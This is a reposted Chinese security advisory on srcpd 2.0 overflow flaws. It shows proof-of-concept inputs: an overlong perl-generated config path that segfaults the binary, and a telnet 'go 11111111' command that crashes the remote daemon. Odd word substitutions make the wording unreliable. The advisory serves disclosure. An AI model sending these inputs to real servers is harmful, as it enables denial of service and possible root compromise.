Srcpd多个缓冲区溢出漏洞
受影响系统:
Srcpd Srcpd 2.0
形貌:
srcpd是一款基于SRCP协议完成的服务步伐。srcpd存在多个缓冲区溢出问题,远程和当地打击者可以利用这些毛病提拔权限或以root用户权限在系统上实行任意指令。
相关毛病如下:
1、当地缓冲区溢出:
srcpd对conffile文件长度处理不正确,如果conffile文件长度大于srcpd.c文件中定义的MAXPATHLEN,当srcpd剖析时可触发溢出,如:
[over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 1197)]
0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6
2、远程基于货仓的溢出:
在方法处理中存在多个基于栈的溢出毛病,如handleSET() , handleGET()等,提交超长的参数给Srcpd可招致步伐崩溃,精心构建提交数据可以以root用户权限在系统上实行任意指令。
3,远程整数溢出:
Srcpd步伐对用户提交的'go'下令请求短少充实处理,提交一个超长的值的参数会发生基于整数的溢出,如:
[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
srcpd V2; SRCP 0.8.2
go 11111111
1060333759.411 200 OK GO 1
go 11111111
Connection closed by foreign host.
[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
<*泉源:Over_G (overg@mail.ru)
链接http://marc.theaimsgroup.com/?l=bugtraq&;m=106148305612998&w=2
*>
厂商补丁:Srcpd
目前厂商还没有提供补丁或者升级步伐,我们建议利用此软件的用户随时存眷厂商的主页以获取最新版本http://srcpd.sourceforge.net/
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
